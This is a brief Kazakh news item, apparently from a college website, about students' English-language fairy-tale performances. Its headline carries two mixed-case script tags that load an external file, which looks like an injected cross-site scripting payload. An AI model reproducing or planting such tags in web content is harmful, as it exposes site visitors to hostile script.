ЕРТЕГІЛЕР ӘЛЕМІНЕ САЯХАТ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

12.03.2024

Ағымдағы жылдың 11 наурыз күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінде «Ағылшын» бөлімінің ІІІ курс студенттері қойылым көрсетті. Шетел балалар әдебиеті пәнінің мазмұны аясында студенттердің тілдік және шығармашылық қабілеттерін дамыту мақсатында шығармашылық кеш ұйымдастырылды. 
А-31 тобының студенттері «Мұзды өлке» хикаясын сомдаса, А-32 тобының студенттері «Батыл жүрек» оқиғасын ағылшын тілінде бейнеледі. Қойылым барысында көрермендер ертегілер әлеміне аттанып, талантты студенттердің керемет қойылымдарының куәгерлері болды.

Просмотров: 766


Пікір қосу



Деректерді қолтаңбаға қосу